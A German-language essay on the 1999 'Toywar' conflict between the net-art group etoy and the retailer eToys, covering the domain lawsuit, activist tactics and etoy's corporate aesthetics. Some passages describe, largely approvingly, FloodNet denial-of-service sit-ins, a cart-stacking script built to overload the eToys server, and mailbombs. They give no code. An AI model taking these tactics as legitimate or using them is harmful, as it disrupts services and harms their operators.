Im Zentrum des Beitrags steht die „gewalttätige“ Auseinandersetzung um den domain Namen von „etoy“. Ein Announcement an die Netzgemeinde („etoy TIMEZONE / & a law suit“ Datum 05.11.99 21:28:33 MEZ vom Agenten zai@etoy.com) kündigt an, dass der 1997 gegründete amerikanische Spielwarenkonzern http://www.eToys.com/ (mit „s“) einen Prozess in Kalifornien am 8. November 1999 gegen die Netzkunst Gruppe etoy angesetzt hat, die seit 1994 diesen Namen offiziell und rechtmäßig benutzt und ihn als com. domain am 13. Oktober 1995 international registriert hat. Der Gegner ist die online Vertriebsfirma eToys ein virtuelles start-up Unternehmen, Ende 1996 gegründet und seit Ende 1997 im Netz aktiv. 1999 hat die Firma am NASDAQ ihren IPO mit ca. 80 $ Millionen Startkapital, damit will sie zum Marktführer werden. Ihre Rigorosität basiert auf ihrer rein virtuellen Existenz, die durch schwankende Aktienkurse infragegestellt wird. Seit 1998 versucht eToys die domain etoy.com von etoy zu erwerben. Die Angebote reichen von einigen 100 $ für die Übernahme am Anfang, bis zu 524 000 $ (bar und in Form von Aktien Ende 1999) vor der Gerichtsverhandlung, die die künstlerische Webpräsenz vorübergehend beendet. etoy lehnen alle diese Angebote ab, da sie den Kern der künstlerischen Arbeit betreffen.

„the domain name is the established and exclusive way to consume the famous and multiawarded etoy.ONLINE-ENTERTAINMENT-SERVICES (the core of the etoy.IDENTITY since 1995). a well established brand in the media art world – our whole identity.“ (Announcement Datum:21.11.99 03:23:37 MEZ From:wunderkind@etoy.com)

Über eine einstweilige Verfügung wird die unliebsame künstlerische Namenskonkurrenz auf dem Keyboard gesperrt. Das Ziel von eToys ist die Künstler-Korporation aus der Ebene der TopLevelDomains zu verbannen, ihnen Globalität und Internationalität zu rauben und sie auf die Länderkennung ch für Schweiz zu verweisen.

Der Angriff wird ein Fanal für den Kampf um eine globale Kunst und internationale Projekte im systemischen Bereich des dot.com. Die „toy retailer“ beschuldigen etoy des domain name squatting und versuchen mit ihrem juristischen Stab die Künstler über die Prozesskosten und durch Kriminalisierung auszuschalten. Das Cybersquatting verlief hier genau umgekehrt, eine Corporation will eine künstlerische domain juristisch besetzen. etoy werden vor Gericht als illegal und kinderschädigend und als „criminal, hackers, pornographers and terrorists“ bezeichnet. Als sich ein Enkel mitsamt Großvater im Internet zu etoy verirrt und sich bei der Firma eToys beschwert, nutzt diese die Gelegenheit, um den unliebsamen Konkurrenten zu attackieren. Besonders das Produkt „digital hijack“ wird zitiert. etoy werden getreu der Analyse von Foucault zu den Wahnsinnigen inmitten diffuser Masse die ökonomisch Anderen, die die öffentliche Ordnung bedrohen (Fink-Eitel 1989 ,26) stilisiert, man versucht die juristische Entmündigung des Abweichenden.

„for the etoy.BOARD: AGENTS zai, gramazio & kubli, etoy, the corporation that infects global markets and family values… a virus growing in the heads of your little daughters & sons… sponsored by art investors around the globe“ –,

Auch die Scheu vor negativen Berichten in den Medien, die etoy mit dem Support von vielen Medienaktivisten ankündigen und die sich als Gesamteindruck auf die Investoren auswirken könnte, hält die Firma nicht vom Prozess zurück. Die Klage lautet auf Verletzung des Warenzeichens. Bei dieser Art der Klage in den USA haben non profit organisations keinerlei Chance, weil auf der Stelle eine finanzielle Belastung von 100 000 Dollar damit verbunden ist. Die Firma rechnet also damit, dass etoy langwierige Prozesse und Beweisverfahren auf amerikanischem Boden sowieso nicht bezahlen können. „Sie lassen uns bluten, bis wir tot sind. Aber in etoy fließt kein Blut, wir werden nicht bluten.“

etoy zeigen sich zunächst optimistisch: „for etoy: your action entertainment agents always online – sometimes lost „, da juristisch einige Dinge für sie sprechen, der kleine Unterschied, das fehlende „s“ und die sehr viele frühere Registrierung lassen hoffen. Ein negativer Gerichtsbeschluss wird im kalifornischen Bezirksgericht aufgeschoben, um die Kosten für die Künstler in die Höhe zu treiben. Am 29. November wird die domain etoy.com per einstweiliger gerichtlicher Verfügung bei Strafandrohung von 10 000 $ Strafe täglich mit folgenden Worten gesperrt:

„defendant etoy corporation d/b/a etoy („etoy“), and any and all persons acting on behalf or in concern with etoy, are hereby enjoined from doing any of the following pending final adjudication of this action: 1. operating a website with the domain name of www.etoy.com 2. using, displaying or otherwise exploiting in any way the domain name www.etoy.com in connection with the digital hijack. 3. selling, offering to sell, soliciting offers to purchase shares of unregistered shares „etoy stock“ to any person in the united states or in california. signed november 29, 1999: john p. shook, judge, los angeles county superior court“.

Hier manifestiert sich die Einschränkung der Möglichkeiten der unreglementierten Nutzung des Netzes. Die Konfusion, die ein künstlerisches Projekt, das das Ghetto Kunst verlässt und im Netz als öffentlichem Raum agiert, verursacht, wird von der Ökonomie nicht mehr geduldet. Etoy verdoppeln Business Values so überzeugend, dass die Parodie und Übertreibung nicht erkannt werden. Sie spielen zu überzeugend nach den Regeln eines ökonomisch bestimmten Wertsystems, dass sie auch Teil dieses Systems sein könnten.

„disclaimer: etoy.SHARE is an illegal ART PRODUCT in the USA since november 28, 1999. do not try to purchase etoy.SHARES if you are located in america or if you are an american citizen… thank you for your investment in a better future without corporations destroying freedom on the net.“

Die Shares, die etoy nicht nur symbolisch verkaufen, sind eine Visualisierung von Spekulationsvorgängen und Wertsteigerung. Sie zeigen das irrationale Verhalten von Märkten, die schon lange vor den Neuen Märkten e-commerce und nasdaq virtuell geworden sind (vgl. Baudrillard 1983). Auf diesem Terrain werden Mythen, Utopien und Erzählungen, Gerüchte, die entscheidenden Faktoren für Gewinn und Verlust in Billionenhöhe. Eine dieser Geschichten führt zu der ersten Niederlage für etoy:

„this was it. NO CHANCE. NOT AT ALL. NO REAL DISCUSSION. NO INTEREST IN THE DETAILS AND HIDDEN MOTIVES FOR THIS COMPLAINT (which is MONEY and nothing else!). „with this decision we are literally knocked out and had to shut down our apache web server a few hours later. one of the hardest moments in our successful history. the etoy.BOMB has detonated !“ ONE SINGLE („F*CKING FLASH PLUGIN“) displayed for a few weeks on the etoy site was judged sufficient to shoot down the etoy.DOMAIN because – according to eToys Inc. – it disturbs the eToys business and confuses customers about the eToys trademark.“
„we just got 30 pages about the topics of the etoy.INTEROGATION! they force us to tell our whole life story… all the details! Just everything! from kindergarten to the university and backwards. we have to prepare about 500 (!!!)documents (from passports, employment documents of the last 10 years, all the log files from every server we operate to the email communication and every publication about our art shows…. further more financial details and and its all listed in this 30 pages document. (From:zai@etoy.com)

etoy schwenken auf die nackte IP Addresse: http://146.228.204.72:8080. Zusätzlich wird die Site www.toywar.com etabliert und bietet den unterstützenden Netzaktivisten wie www.rtmark.com, the thing new york, ninfomaina, detritus.net, illegal art, plagiarist.org, namespace, negativeland, evolution control commitee, styro2000, boombox.net und personal records eine Plattform für den Widerstand. Diese kämpfen für die Freiheit der Kunst im Netz und gleiche Rechte für Kunst und Kommerz. Ihr Ziel ist es, den Verkauf von digitalem Territorium an die Corporations zu verhindern und ein faires Miteinander und eine friedliche digitale Nachbarschaft wiederherzustellen.

Dann entfernt Network Solutions auf ökonomischen Druck nach ersten Widerstandaktionen den DNS Entry von etoy, obwohl es nicht Teil des Gerichtsurteils ist. etoy werden von ihrer Community abgeschnitten.

***we are in a crisis situation!***first NETWORK SOLUTIONS shot down our DNS entries… We switched to temporary email accounts. now some one shut down the second email account we were using to stay in contact with journalists. NEW EMAIL ADDRESS -> e07@toybomb.com IS ACTIVATED. TOTAL WAR. EVERY OLD etoy.ACCOUNT CHANGES INTO xy@toybomb.com for instance mailme@etoy.com is now…
even more terror: last night our webserver (which runs under the ip, former www.etoy.com) was shut down. .. we don’t have the time to do massive research on this as long as we are attacked by 30 attorneys on the court level… but this server never crashed during two years.. please understand if we do not inform you properly … we are just not able to do so! all our platforms are under permanent attack by this hypocritical bastards…
„TOY-NAM TRAP recognized? withdrawal? ——>NO! the shares are down at $30.8125 (today 23.12.99 14:47). the etoy.BOARD decided to transfer 64.000 etoy.SHARES (of totally 640.000 units) into the TOYWAR resistance project. [[ the user is the judge – the shareholder is the artist ]]

Dieser Präzedenzfall ist der Indikator dafür, dass sich die Machtverhältnisse im Internet verschoben haben und der Graben zwischen kommerziellen und nicht kommerziellen Interessen im WWW sich weit geöffnet hat. Das Internet stellt nach der New World Order nur noch ausdrücklich ausgewiesene Freiräume für die Kunst zur Verfügung, wie in der handfesten Realität, für das System Kunst festgelegte Tummelwiesen. Der Fall von etoy zeigt, dass sich nicht mehr, wie anfänglich, alle gesellschaftlichen Systeme nebeneinander und gleichberechtigt im Erwerb von Domainnamen entwickeln dürfen.

Typisch für alle erfolgreichen Aktionen der Net-Activists ist die Konstruktion von verschiedenen medialen Levels, der virtuelle Widerstand kann von juristischer bis rein anarchischer Zerstörung changieren. Bei toywar agieren die Künstler selbst von einer juristisch einwandfreien Plattform. Über die Mailing List rhizome.org wird mit den Aktivisten von rtmark der Widerstand zu effektiven politischen Formen zusammengezogen, die auf die Vernetzung zwischen Web- Print- TV und der Realität der Straße zielen. Hier werden neue vernetzte Formate des zivilen Ungehorsams erprobt. Es gibt ein neutrales „Campaign Information Center“, ein Advisory Board mit den Theoretikern Barlow und Rushkoff, wo alle Informationen zusammenlaufen und an die Presse weitergegeben werden, rhizome org steht hier zur Verfügung. Ihre Unterstützer organisieren eine Pressekonferenz im MOMA in New York und Proteste vor dem Firmenhauptsitz. Die infrastrukturellen Maßnahmen setzen auf der Plattform the thing an, wovon EDT agieren. The thing bekommt nach einer floodnet Attacke ebenfalls den langen Arm von eToys zu spüren, der Teilbereich wird kurzfristig abgeschaltet. Die nächste Ebene ergänzt die infrastrukturellen programmabhängigen Aktionen. Diese Kampagnen verlassen den Bereich des Internets, sie richten sich an Shareholder und die Mitarbeiter der Firma: a. Toby step down, der Geschäftsführer soll zurücktreten, b. Web against etoy und c. quit eToys, eine Aufforderung an die Mitarbeiter zu kündigen. Diese Aktionen werden initiiert und organisiert von der rtmark corporation und als lustiges Multi-Player Online Spiel angekündigt: Help destroy eToys.com! December 12, 1999 new INTERNET „GAME“ DESIGNED TO DESTROY ETOYS.COM.

rtmark sind die Speerspitze des Protests einer Internet Community, die Corporations und ihre Machtansprüche nicht nur im Netz bekämpft. rtmark erstellt hierfür einen ihrer subversiven mutual fonds mit den Komponenten: Ideengeber, ausführender Worker und Investor. (http://rtmark.com/etoypress.html). Die Projekte im etoy Fond haben die Absicht den Wert der eToys Aktien auf Null zu drücken. Hier werden auch die DoS Attack FloodNet Applikationen integriert, die die Server der Firma während des Weihnachtsgeschäfts massiv behindern sollen (http:// rtmark.com/sitin .html). Eine andere wichtige Agitationsmethode ist auch die Offenlegung und Verteilung von Informationen über die Firma.

„This game is much more exciting than any other computer game, because you have a real-world bad guy to fight,“ said RTMark spokesperson Lucha. „eToys says etoy.com was hurting sales by disturbing those who stumble upon it. Well, eToys‘ domain is disturbing people who want to see great internet art but stumble upon eToys instead, and so why not say eToys shouldn’t exist? Why should financial might make right? If they want to play by barbaric rules, we will too.
„eToys feels comfortable destroying art for the benefit of its business, so all the players of this game can feel great destroying eToys—for the benefit of art,“ said Lucha (Annoucement über Rhizome.org).

rtmark starten eine infowar-Desinformationskampagne mit Unterstützung des Electronic Disturbance Theatre. Sie und andere koordinieren verschiedene Aktionen auf unterschiedlichen Ebenen im Netz, über Fax und Telefon, um die interne und externe Kommunikation von eToys.com empfindlich zu stören und die Investoren zu verunsichern. Auf der Website von eToys werden die Eingabefelder mit Protesten okkupiert. Am 16. Dezember zeigt das virtuelle Sit-in Erfolg. Es erzeugt hohen Traffic und verfälscht die statistischen Daten. Der Server wird immer nur kurz, 15 Minuten lang, in den Tagen des Weihnachtsgeschäfts attackiert. Alle von der protestierenden Netcommunity ergriffenen Software-Maßnahmen sollen den eToys‘ Server überlasten und zur pausenlosen Abarbeitung von unzähligen Routinen zwingen. Von sieben oder acht rotierenden Mirrorsites, auf denen fünf unterschiedliche Skripte laufen, kommen Aktionen. Neben den Floodnet Attacken ist eine weitere Taktik, den Counter für die finanzielle Evaluation der Website unbrauchbar zu machen, d.h. eine Webstatistik der Firma zu entwerten. Dazu stapelt das nicht-lineare Skript „killertoy.html“ ununterbrochen Einkäufe in cookies-basierte Warenkörbe, natürlich ohne zu kaufen. Der Server ist so gezwungen, bei jedem vermeintlichen Einkauf die gesamte Liste neu zu generieren. Die Mirrorsites produzieren täglich über hunderttausend Anfragen und die benötigte Zeit für das Ausrechnen der Liste wird immer länger. Dieses „super_plus_version“ Skript führt zur Schließung der Plattform the Thing durch den Backbone-Provider Verio. Zu den Skripts kommen Tools, die die einzelnen Nutzer auf dem heimischen PC installieren können und individuelle email Aktionen, wie die „mailbombs“, die eToys Kundenabteilung und das Management Stück für Stück ohne Programmroutinen abarbeiten müssen. Es geht um einen symbolischen Angriff auf einer breiten Basis, um Protest, keine Hacker-Aktion.

Der Aktienkurs der Firma sinkt im Laufe der Aktion im Zusammenspiel mit der Dynamik des Marktes, also den systeminternen Vorgängen des Nasdaq, um 50%. Die virtuellen Spielwarenhändler bekommen Konkurrenz von traditionellen Handelsunternehmen wie Toys’R’us, die auch den elektronischen Markt erobern wollen. Der Wertverlust der eToys Aktie ist berechenbar, am 20. Mai geht sie an die Börse. Der Aktienkurs ist nach der Einverleibung der zu erwartenden Umsätze des Weihnachtsgeschäfts im November schon auf dem Weg nach unten. Die Bad News im Umgang mit den Künstlern, die Einflussnahme der Webcommunity in den Investorenforen und die schlechte Presse kommen da gerade recht, um den Abgang des Kurses zu beschleunigen und zu zementieren. Ein typischer Vorgang ist, dass nach dem IPO an der Börse, ein Kursverfall erfolgt, wenn das ausgegebene Papier die Phantasie, also keine überzeugende Erfolgsstory parat hat. Dies ist unabhängig von den eigentlichen Umsatzzahlen. Die künstlerischen Aktionen legen damit die Mechanismen und Monstrositäten des Neuen Marktes und Phänomenen wie start-up frei. Sie verweisen künstlerisch darauf, dass es absurd ist von einer Realität zu sprechen, vielmehr existieren verschiedene Realitätsebenen, die quer zu Realität und Virtualität verlaufen.

„Die eigentliche Dynamik liegt in der Story, dem Imaginären der Börse, die wie der Föhn solange für Auftrieb sorgt, wie heiße Luft nachgeliefert wird. Wer die Wendemarken antizipiert und kreiert, verdient sowohl bei der Berg- als auch bei Talfahrt“ (Grether 9.2.2000 Telepolis).

Toywar Victory: the user is the judge © etoy kisses from your etoy.AGENTS (SOFTWARE&HUMAN BOTS)

Wie man auf der Siegesparade der toywar auf der wiederhergestellten Website ablesen kann, ist der weltweite support für die etoy-corporation riesig. Die Toywar Kampagne ist deshalb einzigartig, weil so viele Aktivisten und Künstler zusammengearbeitet haben. Ein bestehendes, loses Netzwerk wird aktiviert durch eine gemeinsame Aktion und ergänzt die Verbindungen im Real Life und gewinnt neue Mitglieder. Unterschiedliche Aktivitätsformen und die Toywar-Battlesite binden die Internetgemeinde auf gemeinsamen Plattformen zusammen und bündeln die Kraft der Einzelnen.

(an invitation from another subscribed toy-soldier is needed), intelligence, and endurance to enter the etoy.RESTISTANCE platform http://www.toywar.com. we hope the community understands that we can not accept every curious user in this extreme media war zone. etoy has to protect itself from spies, enemies and naive terrorists. that’s why this selection takes a few days before the actual battle starts. etoy can not risk digital suicides and the injury of innocent and unexperienced users. as soon as the first 700 elite pioneers have formed a strong TOY-TROOP and have organized the battle field the next round will start. we keep you updated. … as soon as the first toy-bombs are ticking on TOYWAR.com we will issue TOYWAR-GUEST-ACCOUNTS for standard users (without permission to fight) just to observe the net art activities from save seats behind bulletproof windows. in a few days you can also purchase guest accounts at the official TOYWAR-SHOP for 4.99$. (message 4. Januar 2000).“

Das Toywar Spiel läuft folgendermaßen ab. Ein virtuelles Schlachtfeld wird eröffnet, 700 Agenten stellen die erste Elitekampftruppe dar. In einer zweiten Runde können registrierte Agenten und Toy Generals Soldaten rekrutieren, die die Battlefields von Santa Monica, San Francisco, Hanoi, Italien, Ibiza, Tonga, Großbritannien, Schweiz, São Paulo, Cuba, Tokyo besiedeln. Bei der Rekrutierung können sich die Mitwirkenden für eine Funktion entscheiden, zur Auswahl stehen Bombenleger, Bankangestellter, DJ, Soldat, Spion, Anwalt, Reporter, und Programmierer. etoy formulieren hier visuell die für sie wichtigen Handlungen in einer Figur, die entsprechend ihrer Funktion mit Utensilien versehen sind. Neben Dynamitstange und Bombe mit Zündschnur gibt es Gasmaske, Camouflage Kampfanzüge und Kameras, Laptops und Turntables, die als Waffe eingesetzt werden. Auf den Schlachtfeldern, die man auch wechseln kann, gibt es eine Radarfunktion, die erlaubt, die anwesenden Agenten aufzuspüren und mit ihnen zu kommunizieren. Alle Schlachtfelder hatten je nach den Agenten und Generälen, die diese besiedelt, ihre besondere Funktion. Es gibt dort tools z.B. um Emails in einen großen Verteiler einzuspeisen oder um Musik auszutauschen, hier entsteht die CD „Toywar lullabies“. Später gibt es auch die Möglichkeit als Tourist mit umgehängter Kamera die Battlefields zu bereisen. Per Hubschrauber werden die Schaulustigen zum Ort des Geschehens transportiert und dürfen sich fünfzehn Minuten umschauen.

Nach der Rückeroberung des Domainnamens gibt es eine Siegesparade auf der Website, die auch die Verlierer zeigt (Toby Lenk, CEO von eToys). Der Spruch cheer on the heroes and heroines begleitet die Parade und die Beteiligten werden nach dem Anteil der Hilfe, die sie geleistet haben, repräsentiert. Es beginnt mit der Stretchlimousine des Anwalts, dann folgt ein Truck der den etoy tank transportiert, es folgen etliche Generäle und Kriegshelden, besondere Wagen für rtmark oder the thing net (ein Hubschrauber), zuletzt die Truppentransporter mit dem Fußvolk. Die geflashte Parade zieht von rechts nach links über den Bildschirm. Die Benutzung der militärischen Metapher impliziert eine Hierarchie, die hier auch klar visualisiert ist.

Die Kampfaktivitäten des Fußvolks konnten z.B. im Schreiben von Emails bestehen. Beim ersten Anlauf verstehen 80% der Mitspieler den Prozess nicht richtig und schaffen es nicht sich zu registrieren: Das Ergebnis ist ein mit Toywar Särgen gefüllter Seefriedhof im Indischen Ozean auf dem Bildschirm.

„Keine persönliche Begegnung, kein telefonischer Kontakt. Email und Webseiten, sonst nichts. Jeder kann es, Du auch“ (Grether 9.2.2000 telepolis). Genau wie viele Beuys Konzept der sozialen Plastik nicht nachvollziehen können, haben die fehlenden finanziellen oder technischen Skills als User, die Unterstützung der Aktionen teilweise schwergemacht, trotzdem Skills auch auf anderen Ebenen eingebracht werden konnten.

Das zugrundeliegende Partizipationsmodell ist hierarchisch organisiert: Nur die konnten zu hohen Generalsposten aufsteigen, die Skripts schreiben konnten oder die richtigen Orte und Personen kannten. Die toywar verläuft erfolgreich: Anfang 2000 zieht die Firma eToys die Klage gegen etoy zurück und zahlt 40 000 Dollar Aufwandsentschädigung, dafür ziehen etoy die Gegenklage zurück.

Die Kenntnis der Verwundbarkeit von eToys ist entscheidend gewesen, nämlich dass die Webseite das einzige Zeichen der Existenz der Firma ist. Sie vertreibt zwar materielle Güter, hat aber nicht nur eine Zweigstelle im Netz wie Toys’R’us, die nicht von ihrer virtuellen Existenz abhängig sind. Als abstrakte, virtuelle, gesichtslose Firma veranlasst sie abstrakte juristische Vorgänge. Sie ist von abstrakten Börsenkursen abhängig, sie hat keinen direkten link in die materielle Realität.

Von der »ersten Straßengang auf der Informationsautobahn« zu
»Thank you for flying etoy« (Street style und Business to Business)

„offensive, depraved, insane, obscene, prurient, perverse, destructive, anarchistic, rebellious and anti-social in nature „(Zitat aus der Anklageschrift gegen etoy)

Die Surface Visuals und Corporate Identity etoy als Künstler- und Aktiengesellschaft sind auf unterschiedlichen Ebenen wirkungsvoll: der materiellen, im persönlichen Auftritt der etoy Agenten, diese tragen z.B. in ihrer Firmengeschichte jeweils der Situation angepaßte etoy-Uniformen und der virtuellen, dem Erscheinungsbild ihrer Website.

Sie konzentrieren sich im Verlauf ihrer Firmengeschichte immer mehr auf die Präsentation von Hyper-Business Oberflächen, zu denen auch militärische zählen können. Sie enteignen die sichtbaren Konzepte des Business und e-commerce und überformen diese ästhetisch.

Die etoy corporation besitzt shareholder. Ihre gegengezeichneten Shares sind nicht neutral, sondern reproduzierbare „Unikate“, obwohl die etoy Corporation den Wert nur im blueprint der Aktie sieht. etoy.SHARES werden über Galerien und über die Website vertrieben. Über den Kauf von Anteilen oder die Ableistung bestimmter Aufgaben während der Toywar können User Teil des etoy Kunst- und Business Systems werden, das zwischen Netz und Realität oszilliert.

Die visuelle Oberfläche der Aktien enthält eine bedeutende Botschaft. Die Motive der Shares zeichnen in einer neuen Ästhetik der Börse, die Höhe- und Tiefpunkte der Firmengeschichte nach, die man auch auf einem Chart auf der Website nachvollziehen kann. Sie liefern die Visuals für ihre selbstgemachte Geschichte der Akkumulation von kulturellen Werten. etoy shares stehen für subkulturelles und gestalterisches Kapital, an dem die User beteiligt werden können und dessen Wertsteigerung weitere Projekte nährt. Der Zuwachs des künstlerischen und subkulturellen Kapitals erhöht auch den Wert auf dem Markt.

Etoy legen die Standard-Module von Business-Visuals in Layout und Textarbeit zugrunde und transformieren diese Versatzstücke. Im modularen Aufbau der etoy corporation werden bestimmte Elemente variiert und sowohl abstrakt im Web, als auch in der Realität wie z.B. in der Postmasters Gallery in New York 2000 (Ausstellung Impact Management) und auf der Ars Electronica, präsentiert. Dies ist besonders das Konzept des Tank als TCP/IP Daten Package, ein Business und Creative Think Tank und mobiles etoy Headquarter, bestehend aus einem orangefarbenen Container mit dem etoy Schriftzug und damit verbundenen labyrinthischen kommunizierenden Röhrensystemen, die auch das Raster für den Webauftritt darstellen und dort als floatende Hotspots in die nächste Ebene führen.

Für das Gesamterscheinungsbild sind starke Kontraste ein wichtiges Gestaltungsmittel. Der Bild- bzw. Bildschirmhintergrund ist meist schwarz oder dunkelblau (Shares z.B. von cui)

Auf diesen Hintergrund werden die Schriften in Primär- und Sekundärfarben gesetzt. Dominant ist die Farbkombination schwarz und die Signalfarbe Orange.

etoy zitieren verschiedenste Referenzsystemen und übertreiben deren triviale Stereotypen: Sie beginnen ihre Laufbahn als Agenten, mal im Security Business, mal angelehnt an filmische Figuren wie James Bond. Die Agenten bewegen sich im Laufschritt mit Koffern, sie steigen aus Hubschraubern auf schneebedeckten Höhen. Auf der Ars Electronica 2000 treten die Agenten erstmals mit zwei Hostessen auf, die nach etoy CI gekleidet sind, schwarz orange, orange Schiffchen auf dem Kopf, orange Röcke, schwarze Handschuhe. Ihre übertriebenen Posen sind der zivilen Luftfahrt, den Fluggesellschaften, entlehnt. Bei ihrem Slogan „Thank you for flying etoy…“, eine konsequente Entwicklung der Corporation.

Alle Gegenstände (Koffer, Funkgeräte oder die Schlagstöcke des Agenten im Digital Hijack) sind mit dem Namen etoy gelabelt, etikettiert. Der etoy Schriftzug taucht überall auf, selbst auf dem Klebeband für die Verpackung der etoy Shares und auf e-Pillen 1996. Der etoy Schriftzug wird als Zeichen von Globalität klein geschrieben. Weitere etoy Accessoires sind die Magnetkarte für die Mitglieder der Community und die shareholder, sie dient als Visitenkarte.

Das Erscheinungsbild der Agenten ist gleich. Sie sind uniformiert und präsentieren sich als ent-individualisiertes Kollektiv. 1996 tragen sie beim Digital Hijack orange Fliegerjacken, Spiegelsonnenbrillen und kahle Köpfe und präsentieren sie sich als entpersönlichte nicht menschliche Cyber-Agenten. Ihre Ästhetik, schwarze Lederhosen und DocMartens Springerstiefel, ist dem Underground entlehnt, und elektronisch verstärkt. Die Agenten strahlen zunächst eine maskuline Coolness und Härte von isolierten wagemutigen Helden aus, die straff im etoy Kollektiv organisiert sind. Die Aura vom Businessman entwickelt sich im Stil erst in den folgenden Jahren. Die Nicht-Individualität und kollektive Anonymität haben neben der konzeptuellen Bedeutung auch eine handfeste Schutzfunktion bei Aktionen, da die Agenten schwer zu unterscheiden sind.

Auch bei einem Event wie Toywar wird der Kleidungsstil der Agenten angepasst und durchgestaltet im etoy style. Der Agent trägt unter dem Business Outfit, Jackett mit Sponsoren Aufnähern (dies ist eher dem Motorsport entlehnt), der Bedrohung angemessen eine kugelsichere Weste in Orange. Auch hier ist die eigentliche Funktion dadurch dass die Schutzplatten herausgenommen werden und durch die auffällige Farbe, außer Kraft gesetzt. Nach der erfolgreichen toywar tragen die Agenten Generalsabzeichen aus Lego. Etoy vollziehen einen Wandel von gesetzlosen Straßenräubern des Internet zu gesponserten Businessmen.

etoy besitzen eine reduzierte CI, da diese sich ausschließlich nach außen richtet. Damit hat ihr Prinzip des Repräsentierens Ähnlichkeit mit dem represent Konzept des HipHop, das von der Realität des selbstkonstruierten Bildes ausgeht.

Radical and digital conservative
= subversiv=etoy

etoy beherrschen die Spielregeln des immateriellen Business und haben eine geschlossene Corporate Identity auf der Basis einer künstlerischen Sprache entwickelt. Während ihr Gegner aus dem e-business, die Firma eToys, nichts aus dieser puren Virtualität heraushebt, ist die etoy corporation in der Ausgestaltung ihrer Persönlichkeit fest in der Realität verankert. Würde ihr Slogan „…we „left reality behind“ … long time ago…“ etoy: generating cultural value & global impact …since 1994″, so zutreffen, hätten sie diesen Fall nicht gewonnen. So ist der Slogan nicht, wie Stalder behauptet, der Grund, warum sie von einer unangenehmen Realität eingeholt worden sind (Stalder Telepolis 22.11.1999). Die Arbeit der etoy.cooperation besteht in der geschickten ästhetischen Verzahnung von medialer und handgreiflicher Realität, die schon lange über abstrakte und juristische Tatsachen gesteuert werden. Die Wirksamkeit der geschilderten Netzaktivitäten besteht im Hin- und Herpendeln von der Kunst ins Leben und vom Leben in die Kunst zurück.

Die Kombination von gut designten und getimten Webstrategien, der Websupport für toywar, aber vor allem die personellen Verbindungen im real life z.B. zu Printmedien, Anwälten, Aktivisten und Theoretikern haben die Künstler diesmal gewinnen lassen.

Das Modell toywar zeigt für zukünftige künstlerische und Businessstrategien mögliche Interfaces: webintern über Plattformen und zwischen Web und Realität. Nur wer zu beiden Ebenen elegante Schnittstellen besitzt, kann den Kampf gewinnen.

Ambivalent zeigen sich auch die toywar-Spielzeuge, die etoy Soldaten im Lego-Playmobil-Stil sind rein virtuell. Sie haben einen konnotativen Bezugspunkt in der Realität, weswegen ein materielles Pendant nicht existieren muss, aber durchaus könnte. Ihre Wahrscheinlichkeit oder potentielle Wahrhaftigkeit, die in totaler Scheinhaftigkeit besteht, ist entscheidend. Alle visuellen Repräsentationen könnten real sein, nur so funktioniert das Modell etoy.

Grether sieht etoy als rein virtuelle Netzexistenzen, als codierte Datensets (telepolis 29.4.2000). Als rein virtuelle Existenz ohne die Rückbindung an Personen, wären sie eToys unterlegen. Gerade die materielle Präsenz der anonymisierten Agenten, ihr spezieller Stil, die Tanksysteme sind etwas was etoy die Präsenz verleiht, die sie so effektiv macht. etoy bespielen unterschiedliche Levels mit den jeweils passenden Repräsentationen.

Sie stellen sich freiwillig in den Kunstkontext. Ihre künstlerischen Konzepte haben viele Wurzeln, z.B. Aktionskunst, Happening oder eine erweiterte virtuelle Konzept-Art. Sie repräsentieren ein von Künstlern gelenktes Schnittstellenmodell. etoy stellen die Zugänglichkeit ihres Materials und die Möglichkeit, dass jeder damit arbeiten kann als wichtiges Prinzip ihrer Arbeit dar. Dabei geben sie nie die Kontrolle aus der Hand. Es gibt genaue Regulative von Seiten der Künstler, die in ihrer CI nichts dem Zufall überlassen. Mehr noch als dass sie ein neues Partizipationsmodell entwickeln und testen, übertragen sie das Aquisition- und Merger Geschäft auf die künstlerische Vernetzung und führen es dort in neue ästhetische Dimensionen.

Kein rebellischer Künstlertyp, keine Avantgarde-Attitüde des Abstreitens von Kunst, wie bei den Aktivisten wie rtmark. Hier treten anti-individualistische, smarte gut gestylte Menschen auf, die auf den ersten Blick gleich aussehen. Der Transfer von Oberflächen des Business in die Kunst, ist auch ein Ausbruch aus dem uniformen System Kunst, da die scheinbare Angepasstheit an die Ökonomie nicht dem Rollenverständnis des Künstlers entspricht. So werden Uniformität und Kollektivität kurzfristig zum Schock. Die scheinbare Entindividualisierung und freiwillige Uniformierung verstärkt die Effektivität des kollektiven Ansatzes, da individuelle Kompetenzen auf einer Plattform gebündelt werden. etoy repräsentieren die Next Generation in der Kunst: smart und webbasiert, elitär und kreativ.

In dem Konzept der etoy corporation laufen verschiedene Stränge von Netzkunst, -aktivismus, traditionelle künstlerische und Marketing-Strategien so wie jugendkulturelle Subversion zusammen. etoy betreiben Appropriation nicht von Kunst, sondern von Business Visuals. Anstatt der klassischen Rebellion, findet die Aneignung der Waffen des Business statt für einen strukturellen Oberflächenkampf und die ästhetische Besetzung von Räumen.

Außerdem nutzen sie die anarchische Frechheit von Jugendkulturen. Das, was Felix Stalder als Bad Boy Attitude in seinem Telepolis-Artikel bezeichnet, ist die typische „Dandy Haltung des ästhetischen“ Menschen (vgl. Mattenklott 1987). etoy bringen künstlerische Bohemehaltung und die jugendkulturelle Provokationskraft wieder zusammen.

Diese Net.Art durchkreuzt politische und ökonomische Räume. Sie bleibt nicht in dem zugewiesenen Freiraum. etoy verstoßen gegen das ungeschriebene Gesetz des Systems Kunst, sich nicht in andere Systeme einzumischen. Die Firma eToys will sie hinaus aus dem Leben in die Kunst zurückschleudern, weil sie als Pioniere für Business Visuals in art und als visueller Virus kommerzielle Räume besetzt haben, als diese noch öffentlich waren. Diese Kunst besetzt nicht bescheiden die Nischen, die gelassen werden, sondern sie hat sich ihren globalen Platz schon lange vorher erobert und bespielt. Es ist unerträglich für eine kommerziell geprägte Welt, dass Künstler Corporations die Strategien einer Corporate Identity in unterschiedlichen Medien beherrschen, d.h. ihre Praxis enteignen. Durch die Marke etoy wird die Kunst zur Konkurrenz für das Business auf der visuellen und strukturellen Ebene. etoys visuelle Verdopplung der Repräsentanz von Business, schafft eine zweite Business Welt, die sich auf ihrer Oberfläche kaum unterscheidet.

